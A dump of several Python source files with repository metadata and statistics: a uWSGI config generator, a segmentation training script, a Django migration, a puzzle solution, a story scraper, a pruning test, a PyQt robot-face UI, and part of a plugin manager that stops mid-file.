bd910c797a7c02460f8f88af118cb92f19b632c2
1,857
py
Python
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
from django.conf import settings from django.template.loader import render_to_string import ConfigParser from collections import OrderedDict import sys from Crypto.PublicKey import RSA class AllowsSameKeys(OrderedDict): def __setitem__(self, key, value): if isinstance(value, list) and key in self: self[key].extend(value) else: super(OrderedDict, self).__setitem__(key, value) c = ConfigParser.ConfigParser(dict_type=AllowsSameKeys) c.readfp(open(sys.argv[1])) # django snippet 646, raise an Exception missing var class InvalidVarException(object): def __mod__(self, missing): try: missing_str=unicode(missing) except: missing_str='Failed to create string representation' raise Exception('Unknown template variable %r %s' % (missing, missing_str)) def __contains__(self, search): if search=='%s': return True return False settings.configure(TEMPLATE_DIRS=('uwsgi_it_api/templates',), TEMPLATE_STRING_IF_INVALID=InvalidVarException()) rsa_key = RSA.generate(2048).exportKey() container = { 'name': '30000', 'hostname': c.get('uwsgi','api_domain')[0].replace('.','-'), 'uid': 30000, 'ip': '10.0.0.2', 'server': { 'hd':c.get('uwsgi','api_hd')[0], 'etc_resolv_conf_lines': c.get('uwsgi','api_resolvconf'), 'etc_hosts_lines': c.get('uwsgi','api_hosts'), }, 'quota': 20 * 1024 * 1024 * 1024, 'memory_limit_in_bytes': 1024 * 1024 * 1024, 'distro': {'path': 'precise'}, 'quota_threshold': 90, 'ssh_keys': c.get('uwsgi','api_ssh_key'), 'customer': { 'rsa_key_lines': rsa_key.split('\n'), 'rsa_pubkey_lines': RSA.importKey(rsa_key).publickey().exportKey().split('\n'), }, } print render_to_string('vassal.ini', {'container': container})
32.578947
111
0.653204
229
1,857
5.065502
0.502183
0.017241
0.038793
0.051724
0.02931
0
0
0
0
0
0
0.035594
0.198169
1,857
56
112
33.160714
0.743452
0.026925
0
0
0
0
0.204986
0.035457
0
0
0
0
0
0
null
null
0
0.145833
null
null
0.020833
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd91ba13b85667cd92a61109fae15aca6df3f93b
3,561
py
Python
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
import argparse import os import os.path as osp import torch import torch.nn as nn import torch.optim as optim from eval import evaluate from ever.core.iterator import Iterator from module.deeplabv2 import Deeplab from torch.nn import functional as fn from tqdm import tqdm from data.loveda import LoveDALoader from utils.tools import ( adjust_learning_rate, count_model_parameters, get_console_file_logger, import_config, loss_calc, seed_torch, ) parser = argparse.ArgumentParser(description='Run Baseline methods.') parser.add_argument('--config_path', type=str, help='config path') args = parser.parse_args() cfg = import_config(args.config_path) def main(): """Create the model and start the training.""" os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True) logger = get_console_file_logger(name='Deeplabv2', logdir=cfg.SNAPSHOT_DIR) # Create Network model = Deeplab(nn.BatchNorm2d, num_classes=7) # model = Deeplabv2( # dict( # backbone=dict( # resnet_type='resnet50', # output_stride=16, # pretrained=True, # ), # multi_layer=False, # cascade=False, # use_ppm=False, # ppm=dict( # num_classes=7, # use_aux=False, # norm_layer=nn.BatchNorm2d, # ), # inchannels=2048, # num_classes=7)) model.train() model.cuda() #cudnn.enabled = True #cudnn.benchmark = True logger.info('exp = %s' % cfg.SNAPSHOT_DIR) count_model_parameters(model, logger) trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG) epochs = cfg.NUM_STEPS_STOP / len(trainloader) logger.info('epochs ~= %.3f' % epochs) trainloader_iter = Iterator(trainloader) optimizer = optim.SGD( model.parameters(), lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY) # model, optimizer = amp.initialize(model, optimizer, opt_level="O1") optimizer.zero_grad() for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)): optimizer.zero_grad() lr = adjust_learning_rate(optimizer, i_iter, cfg) # Train with Source batch = trainloader_iter.next() images_s, labels_s = batch[0] pred_source = model(images_s.cuda()) # pred_source is a dict with features and actual output pred_source = pred_source["out"] pred_source = fn.interpolate(pred_source, labels_s["cls"].size()[1:], mode="bilinear", align_corners=True) #Segmentation Loss loss = loss_calc(pred_source, labels_s['cls'].cuda()) loss.backward() optimizer.step() if i_iter % 50 == 0: logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR)) text = 'iter = %d, loss_seg = %.3f, lr = %.3f' % (i_iter, loss, lr) logger.info(text) if i_iter >= cfg.NUM_STEPS_STOP - 1: print('save model ...') ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth') torch.save(model.state_dict(), ckpt_path) evaluate(model, cfg, True, ckpt_path, logger) break if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0: ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth') torch.save(model.state_dict(), ckpt_path) evaluate(model, cfg, True, ckpt_path, logger) model.train() if __name__ == '__main__': seed_torch(2333) main()
33.914286
114
0.627352
450
3,561
4.744444
0.366667
0.018735
0.039344
0.028103
0.123653
0.104918
0.104918
0.104918
0.104918
0.104918
0
0.012126
0.258916
3,561
104
115
34.240385
0.796893
0.184499
0
0.117647
0
0
0.058435
0
0
0
0
0
0
1
0.014706
false
0
0.220588
0
0.235294
0.014706
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd964ac6777bf26c9cd2e0c8102f286788f8ac58
201
py
Python
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
import os def beforeSaveFile(fname): '''makesure the path exists before save file''' dirname = os.path.dirname(fname) if not os.path.exists(dirname): os.makedirs(dirname)
22.333333
52
0.651741
26
201
5.038462
0.615385
0.152672
0
0
0
0
0
0
0
0
0
0
0.238806
201
8
53
25.125
0.856209
0.20398
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bd979067fb3d0b6a4ab0071970a4c14f2b400d8d
1,478
py
Python
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
# Generated by Django 2.2 on 2019-04-22 13:45 import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ ('projects', '0030_allow_null_in_projects_groups_and_layers_file'), ] operations = [ migrations.CreateModel( name='Estimator', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)), ('estimator_type', models.CharField(choices=[('OD', 'Object detection')], default='OD', max_length=2, verbose_name='estimator type')), ('name', models.CharField(max_length=255, verbose_name='name')), ('metadata', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('updated_at', models.DateTimeField(auto_now=True, verbose_name='updated at')), ('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='project')), ], options={ 'unique_together': {('project', 'estimator_type', 'name')}, }, ), ]
42.228571
150
0.631258
162
1,478
5.592593
0.475309
0.072848
0.046358
0.059603
0.13245
0
0
0
0
0
0
0.020122
0.226658
1,478
34
151
43.470588
0.772528
0.029093
0
0
1
0
0.173761
0.034892
0
0
0
0
0
1
0
false
0
0.148148
0
0.296296
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd97ac57a2038b6973c0d833aeb1a199dd43dec5
1,607
py
Python
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
from pathlib import Path from typing import Callable, Iterable, Iterator, List from itertools import chain, cycle, islice, repeat import numpy as np BASE_PATTERN = [0, 1, 0, -1] def read_lines() -> Iterator[str]: with (Path(__file__).parent / "input.txt").open("r") as f: for line in f: yield line.rstrip() def get_inputs() -> Iterator[int]: line = list(read_lines())[0] for i in line: yield int(i) def repeat_each(pattern, repeats: int): return chain(*map(lambda i: repeat(i, repeats), pattern)) def generate_pattern(base: Iterable[int], repeats: int, length: int) -> Iterator[int]: """Generate the pattern as specified by the algorithm. Example: >>> list(generate_pattern([0, 1, 0, -1], 2, 15)) [0, 1, 1, 0, 0, -1, -1, 0, 0, 1, 1, 0, 0, -1, -1] """ return islice(cycle(repeat_each(base, repeats)), 1, length + 1) def create_filter_matrix(length: int) -> np.array: return np.array( [list(generate_pattern(BASE_PATTERN, i + 1, length)) for i in range(length)] ) def create_input_vector() -> np.array: return np.array(list(get_inputs())) def create_last_digit_filter() -> Callable: return np.vectorize(lambda i: abs(i) % 10) def perform_fft(iterations: int) -> np.array: vector = create_input_vector() filter_matrix = create_filter_matrix(len(vector)) last_digit_filter = create_last_digit_filter() for _ in range(iterations): vector = last_digit_filter(filter_matrix @ vector) return vector # print(list(generate_pattern(2, 10))) print(perform_fft(100)[:8])
26.344262
86
0.657747
236
1,607
4.313559
0.313559
0.015717
0.011788
0.011788
0.083497
0.061886
0.014735
0.014735
0.014735
0.014735
0
0.030445
0.202862
1,607
61
87
26.344262
0.764247
0.128189
0
0
0
0
0.007252
0
0
0
0
0
0
1
0.242424
false
0
0.121212
0.121212
0.545455
0.030303
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
bd98c615b517218be23b4c4fa061f1bb81f35762
925
py
Python
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
2
2015-03-25T18:05:50.000Z
2016-05-05T09:49:45.000Z
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
null
null
null
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
null
null
null
from bs4 import BeautifulSoup import urllib2 start_url="https://www.fictionpress.com/s/2780124/1/Rise-From-The-Ashes-OLD" #start url end =False split_url=start_url.split("/") new_url="" for i in range(5): new_url=new_url+split_url[i]+"/" i=1 while not (end): url=new_url+"/"+str(i)+"/" i=i+1 response=urllib2.urlopen(url) html_text=response.read() response.close() foo=open("fiction.txt","a")##File path where you want to save this file soup=BeautifulSoup(html_text) raw_story = soup.select("div > #storytext > p ") if raw_story: title = raw_story[0].get_text() print title for line in raw_story: foo.write(line.get_text().encode('utf-8')+"\n") foo.write("\n ----><-----\n\n\n") else: print "<--the end-->" end=True foo.write("\n------------~~~~~~~~~--------------") foo.close()
21.511628
87
0.566486
133
925
3.819549
0.518797
0.047244
0.035433
0
0
0
0
0
0
0
0
0.02244
0.229189
925
42
88
22.02381
0.690042
0.055135
0
0
0
0.034483
0.204833
0.042578
0
0
0
0
0
0
null
null
0
0.068966
null
null
0.068966
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9906411d0902be3e6498e5a1a56da473448736
2,161
py
Python
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
1
2021-12-30T05:49:10.000Z
2021-12-30T05:49:10.000Z
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
1
2021-07-23T07:46:52.000Z
2021-07-23T07:46:52.000Z
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
null
null
null
""" Copyright (c) 2021 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import pytest from tests.tensorflow.helpers import create_compressed_model_and_algo_for_test from tests.tensorflow.pruning.helpers import get_basic_pruning_config from tests.tensorflow.pruning.helpers import get_test_model_shared_convs @pytest.mark.parametrize( ("model", "all_weights", "ref_full_flops", "ref_current_flops", "ref_full_params", "ref_current_params"), ( (get_test_model_shared_convs, True, 461438976, 276385312, 11534848, 6908711), (get_test_model_shared_convs, False, 461438976, 270498816, 11534848, 6761608) ) ) def test_flops_calulation_for_spec_layers(model, all_weights, ref_full_flops, ref_current_flops, ref_full_params, ref_current_params): config = get_basic_pruning_config(8) config['compression']['algorithm'] = 'filter_pruning' config['compression']['pruning_init'] = 0.4 config['compression']['params']['pruning_flops_target'] = 0.4 config['compression']['params']['prune_first_conv'] = True config['compression']['params']['prune_last_conv'] = True config['compression']['params']['all_weights'] = all_weights input_shape = [1, 8, 8, 1] model = model(input_shape) model.compile() _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config) assert compression_ctrl.full_flops == ref_full_flops assert compression_ctrl.full_params_num == ref_full_params assert compression_ctrl.current_flops == ref_current_flops assert compression_ctrl.current_params_num == ref_current_params
44.102041
96
0.745951
289
2,161
5.283737
0.415225
0.039293
0.060249
0.035363
0.310413
0.193844
0.193844
0.092993
0.092993
0.092993
0
0.045907
0.16335
2,161
48
97
45.020833
0.798673
0.258677
0
0
0
0
0.168561
0
0
0
0
0
0.129032
1
0.032258
false
0
0.129032
0
0.16129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd99509849b2119597bc329227a6d9a8957453fc
61
py
Python
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
from .style import LineStyle __all__ = [ "LineStyle", ]
10.166667
28
0.655738
6
61
6
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.229508
61
5
29
12.2
0.765957
0
0
0
0
0
0.147541
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bd99e09ac29cee3774d16f59b6db9c324075e704
9,812
py
Python
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
33
2020-07-16T06:31:38.000Z
2022-03-23T18:34:58.000Z
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
5
2020-08-27T08:06:21.000Z
2022-02-23T12:34:09.000Z
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
10
2020-08-05T15:05:58.000Z
2021-11-19T10:20:44.000Z
""" Dpoom Face Expression Windows 2019 """ from PyQt5.QtCore import * from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtWebEngineWidgets import * from PyQt5.QtPrintSupport import * import fall_body_1013 as fall_body import os import sys import numpy as np import argparse import imutils import time import cv2 import os import pyrealsense2 as rs import threading import matplotlib.pyplot as plt import uuid import queue specificSet = [ '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python36.zip', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/lib-dynload', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/site-packages'] #sys.path = specificSet MainIndex = "file:///home/dpoom2/dpoom_few/index.html" class AboutDialog(QDialog): def __init__(self, *args, **kwargs): super(AboutDialog, self).__init__(*args, **kwargs) QBtn = QDialogButtonBox.Ok # No cancel self.buttonBox = QDialogButtonBox(QBtn) self.buttonBox.accepted.connect(self.accept) self.buttonBox.rejected.connect(self.reject) layout = QVBoxLayout() title = QLabel("DPoom FEW") font = title.font() font.setPointSize(20) title.setFont(font) layout.addWidget(title) layout.addWidget(QLabel("Version 1")) layout.addWidget(QLabel("Copyright TEAM DPOOM.")) for i in range(0, layout.count()): layout.itemAt(i).setAlignment(Qt.AlignHCenter) layout.addWidget(self.buttonBox) self.setLayout(layout) class MainWindow(QMainWindow): thread_signal = pyqtSignal() send_instances_signal = pyqtSignal("PyQt_PyObject") def __init__(self, *args, **kwargs): super(MainWindow, self).__init__(*args, **kwargs) self.status_emeregency = False self.browser = QWebEngineView() self.browser.setUrl(QUrl(MainIndex)) self.browser.urlChanged.connect(self.update_urlbar) self.browser.loadFinished.connect(self.update_title) self.browser.loadFinished.connect(self.setDefaultExpr) self.setCentralWidget(self.browser) self.status = QStatusBar() self.setStatusBar(self.status) navtb = QToolBar("Navigation") navtb.setIconSize(QSize(16, 16)) #self.addToolBar(navtb) back_btn = QAction("Back", self) back_btn.setStatusTip("Back to previous page") back_btn.triggered.connect(self.browser.back) navtb.addAction(back_btn) next_btn = QAction(QIcon(os.path.join('images', 'arrow-000.png')), "Forward", self) next_btn.setStatusTip("Forward to next page") next_btn.triggered.connect(self.browser.forward) navtb.addAction(next_btn) reload_btn = QAction(QIcon(os.path.join('images', 'arrow-circle-315.png')), "Reload", self) reload_btn.setStatusTip("Reload page") reload_btn.triggered.connect(self.browser.reload) navtb.addAction(reload_btn) home_btn = QAction(QIcon(os.path.join('images', 'home.png')), "Home", self) home_btn.setStatusTip("Go home") home_btn.triggered.connect(self.navigate_home) navtb.addAction(home_btn) navtb.addSeparator() self.urlbar = QLineEdit() self.urlbar.returnPressed.connect(self.navigate_to_url) navtb.addWidget(self.urlbar) stop_btn = QAction( "Stop", self) stop_btn.setStatusTip("Stop loading current page") stop_btn.triggered.connect(self.browser.stop) navtb.addAction(stop_btn) # Uncomment to disable native menubar on Mac # self.menuBar().setNativeMenuBar(False) file_menu = self.menuBar().addMenu("&File") open_file_action = QAction( "Open file...", self) open_file_action.setStatusTip("Open from file") open_file_action.triggered.connect(self.open_file) file_menu.addAction(open_file_action) # save_file_action = QAction(QIcon(os.path.join('images', 'disk--pencil.png')), "Save Page As...", self) # save_file_action.setStatusTip("Save current page to file") # save_file_action.triggered.connect(self.save_file) # file_menu.addAction(save_file_action) # print_action = QAction(QIcon(os.path.join('images', 'printer.png')), "Print...", self) # print_action.setStatusTip("Print current page") # print_action.triggered.connect(self.print_page) #file_menu.addAction(print_action) about_action = QAction("Specif Setting", self) about_action.setStatusTip("detail") # Hungry! about_action.triggered.connect(self.about) file_menu.addAction(about_action) navigate_mozarella_action = QAction("Go Homepage", self) navigate_mozarella_action.setStatusTip("Go to Dpoom home") navigate_mozarella_action.triggered.connect(self.navigate_mozarella) file_menu.addAction(navigate_mozarella_action) self.showFullScreen() self.show() self.th = Worker(parent=self) self.th.start() self.th2 = YoloWorker(parent=self) self.th2.start() self.setWindowIcon(QIcon(os.path.join('images', 'ma-icon-64.png'))) def setDefaultExpr(self): self.browser.page().runJavaScript("eyes.startBlinking()") print('set default expr') def setExpr(self, classN): emoClass = { 0:"eyes.startBlinking()", 1:"eyes.stopBlinking()", 2:"eyes.blink()", 3:"eyes.express({type: 'happy'})", 4:"eyes.express({type: 'sad'})", 5:"eyes.express({type: 'angry'})", 6:"eyes.express({type: 'focused'})", 7:"eyes.express({type: 'confused'})" } self.browser.page().runJavaScript(emoClass.get(classN)) pass def declareEmergency(self): self.status_emeregency = not self.status_emeregency if self.status_emeregency: self.browser.page().runJavaScript('clearInterval(light)') self.browser.page().runJavaScript('var light = setInterval("lightning()",360);') else: self.browser.page().runJavaScript('clearInterval(light)') self.browser.page().runJavaScript('var light = setInterval("getBackwhite()",360);') def update_title(self): title = self.browser.page().title() self.setWindowTitle("Dpoom FEW") def navigate_mozarella(self): self.browser.setUrl(MainIndex) def about(self): dlg = AboutDialog() dlg.exec_() def open_file(self): filename, _ = QFileDialog.getOpenFileName(self, "Open file", "", "Hypertext Markup Language (*.htm *.html);;" "All files (*.*)") if filename: with open(filename, 'r') as f: html = f.read() self.browser.setHtml(html) self.urlbar.setText(filename) def save_file(self): filename, _ = QFileDialog.getSaveFileName(self, "Save Page As", "", "Hypertext Markup Language (*.htm *html);;" "All files (*.*)") if filename: html = self.browser.page().toHtml() with open(filename, 'w') as f: f.write(html) def print_page(self): dlg = QPrintPreviewDialog() dlg.paintRequested.connect(self.browser.print_) dlg.exec_() def navigate_home(self): self.browser.setUrl(QUrl("")) def navigate_to_url(self): # Does not receive the Url q = QUrl(self.urlbar.text()) if q.scheme() == "": q.setScheme("http") self.browser.setUrl(q) def update_urlbar(self, q): if q.scheme() == 'https': # Secure padlock icon pass else: # Insecure padlock icon pass #self.urlbar.setText(q.toString()) #self.urlbar.setCursorPosition(0) class Worker(QThread): #sec_changed = pyqtSignal(str) def __init__(self, sec=0, parent=None): super(Worker, self).__init__() self.main = parent self.working = True self.sec = sec # self.main.add_sec_signal.connect(self.add_sec) # custom signal from main thread to worker thread def __del__(self): print(".... end thread.....") self.wait() def defaultAction(self): while(True): if fall_body.fallFlag: print("fall body detected!!!!!!!") elif fall_body.humanFlag: print("human detected !!!") ###cascade_1013 emoNumber= int(np.random.uniform(3, 8)) try: emoNumber = int(emoNumber) except: pass #window.about() else: window.setExpr(int(emoNumber)) time.sleep(3) print('active') def run(self): self.defaultAction(); class YoloWorker(QThread): def __init__(self, parent=None): super(YoloWorker, self).__init__() self.main = parent self.working = True def __del__(self): print('yolo thread dead') self.wait() def yolo_main(self): print('yolo thread working') if self.working: self.working = not self.working fall_body.main(verbose=0) def run(self): self.yolo_main() app = QApplication(sys.argv) app.setApplicationName("Dpoom FEW") app.setOrganizationName("Dpoom FEW") app.setOrganizationDomain("github.com/shinkansan") window = MainWindow() app.exec_()
30.190769
112
0.614248
1,078
9,812
5.457328
0.288497
0.043005
0.033996
0.015298
0.174061
0.128336
0.113038
0.096209
0.047935
0.031617
0
0.009662
0.261618
9,812
324
113
30.283951
0.802346
0.094884
0
0.134259
0
0
0.143987
0.04193
0
0
0
0
0
1
0.101852
false
0.018519
0.087963
0
0.217593
0.041667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9a1dd2de3b7a992cf45cfd0f9ad879ed786bb2
16,444
py
Python
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
4
2019-05-27T13:55:07.000Z
2021-03-30T07:05:09.000Z
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
99
2019-05-20T14:16:33.000Z
2021-01-19T09:25:15.000Z
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
1
2020-08-10T07:55:40.000Z
2020-08-10T07:55:40.000Z
""" sentry.plugins.base.manager ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import, print_function __all__ = ('PluginManager', ) import sys import os import six import logging import click import importlib from clims.handlers import HandlerManager from sentry.utils.managers import InstanceManager from sentry.utils.safe import safe_execute from django.conf import settings from django.db import transaction from django.db.utils import ProgrammingError logger = logging.getLogger(__name__) class PluginManager(object): """ Handles plugins. Plugins need to be installed via a call to `lims upgrade`. This will install all plugins that are found in the application at the time. When a plugin is found in the environment, it's installed, i.e. added to the database. After that, it needs to exist on load time from there on. It's currently not supported to uninstall a plugin. When the application loads, it will load all plugins that exist in the database. """ def __init__(self, app, instance_manager=None): self._app = app self.handlers = HandlerManager(app) self.work_types = dict() # TODO: Add to a manager class self.instance_manager = instance_manager or InstanceManager() # Install (during upgrade) def auto_install(self): """ Installs all plugins that can be found in the Python environment. An entry for the plugin and version is created in the database. """ logger.info("Auto installing plugins found in environment") plugins = self.find_all_plugins_in_scope() self.install_plugins(*plugins) def install_plugins(self, *plugins): """ Installs the plugins in the backend. Plugins can not be loaded before they have been installed. """ for plugin in plugins: logger.info("Installing plugin class '{}'".format(plugin.get_name_and_version())) with transaction.atomic(): plugin_reg = self.install_plugin(plugin) self.install_extensible_types(plugin) self.install_workflows_in_plugin(plugin, plugin_reg) def install_workflows_in_plugin(self, plugin_cls, plugin_reg): """ Installs workflow definitions found in the plugin. """ logger.info("Loading workflows for plugin class {}".format(plugin_cls)) definitions = list(plugin_cls.get_process_definitions()) logger.info("Found {} workflow definitions for plugin class {}".format( len(definitions), plugin_cls)) for definition in definitions: self._app.workflows.install(definition, plugin_reg) def validate_version(self, plugin_cls): if not plugin_cls.version: raise PluginMustHaveVersion() # Ensure that we can parse the string as a sortable tuple: try: parsed = plugin_cls.get_sortable_version() logger.debug("Plugin {} has a valid version {} => {}".format( plugin_cls, plugin_cls.version, parsed)) except ValueError: raise PluginIncorrectVersionFormat( "Plugin versions must be a list of dot separated numbers, e.g. 1.0.0") def install_plugin(self, plugin_cls): """ Installs the plugin in the database. This method should be called when upgrading the system, so the end-user is in control of when a new model is available. Returns a plugin registration model that represents the installation. """ # Make sure we have a plugin registration here: from clims.models import PluginRegistration self.validate_version(plugin_cls) logger.debug("Recording plugin {} version={} in the database".format( plugin_cls.get_full_name(), plugin_cls.version)) reg, _ = PluginRegistration.objects.get_or_create( name=plugin_cls.get_full_name(), version=plugin_cls.version) return reg def install_extensible_types(self, plugin): """ Installs all the extensible types found in the plugin. These are for example specific Plates, Projects and Samples defined by the plugin developers. """ logger.info("Installing extensible types found in plugin class '{}'".format( plugin.get_name_and_version())) from clims.models import PluginRegistration plugin_model = PluginRegistration.objects.get(name=plugin.get_full_name(), version=plugin.version) for extensible_cls in plugin.get_extensible_objects(): self._app.extensibles.register(plugin_model, extensible_cls) def get_work_type(self, full_name): # TODO: Validate that this is a work type class if full_name not in self.work_types: cls = InstanceManager.find_cls(full_name) self.work_types[full_name] = cls return self.work_types[full_name] def get_extensible_types_from_db(self): """ :return: class objects of extensible types """ from clims.models.extensible import ExtensibleType extensible_types = ExtensibleType.objects.all() type_names_in_db = [e.name for e in extensible_types] for type_name in type_names_in_db: split_type_name = type_name.split('.') full_module_name = '.'.join(split_type_name[:-1]) extensible_class_name = split_type_name[-1] module = self._import_module(full_module_name) extensible_class = getattr(module, extensible_class_name, None) # NOTE: Silently returning nothing if the class wasn't loaded if extensible_class: yield extensible_class else: logger.warn("Not able to load registered extensible {}".format(type_name)) def find_plugins_by_entry_points(self): """ Returns plugins that have been marked as such by adding an entry like: entry_points={ 'clims.plugins': [ 'org_plugins = org_plugins.plugins:YourPlugin', ], }, to the setup.py file in the plugin package. """ # NOTE: Users must specify an entry_point in their setup.py so that plugins will # be discovered. # See e.g.: https://github.com/Molmed/commonlims-snpseq/blob/cd1c011a3/setup.py#L105 from pkg_resources import iter_entry_points entry_points = [ep for ep in iter_entry_points('clims.plugins')] for ep in entry_points: try: plugin = ep.load() yield plugin except Exception: # Handling all exceptions since the code is unknown to us. import traceback click.echo( "Failed to load plugin 